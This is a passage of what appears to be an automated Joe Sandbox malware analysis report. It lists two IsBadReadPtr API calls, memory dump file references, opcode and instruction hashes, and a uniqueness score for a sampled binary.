                                                                                                                                                    • IsBadReadPtr.KERNEL32(?,00000008), ref: 02DFA01F
                                                                                                                                                    • IsBadReadPtr.KERNEL32(?,00000004,?,00000008), ref: 02DFA02B
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1428399500.0000000002DE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DE0000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1428298505.0000000002DE0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1428558383.0000000002E0B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_2de0000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Read$Write
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3448952669-0
                                                                                                                                                    • Opcode ID: 3ad3bb96e2a10f813d86af9a74392d0af8acae6b90b2c130b1f55d269701f8a3
                                                                                                                                                    • Instruction ID: 6d64bb20a25491a925f5e68634c22da23e0dcc80c88cf06363e0930b7f95d247
                                                                                                                                                    • Opcode Fuzzy Hash: 3ad3bb96e2a10f813d86af9a74392d0af8acae6b90b2c130b1f55d269701f8a3
                                                                                                                                                    • Instruction Fuzzy Hash: D521D5B060021AABCF50DF24DC80B9E73A9EF84361F158515EF0497348E734DD11CAA8
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%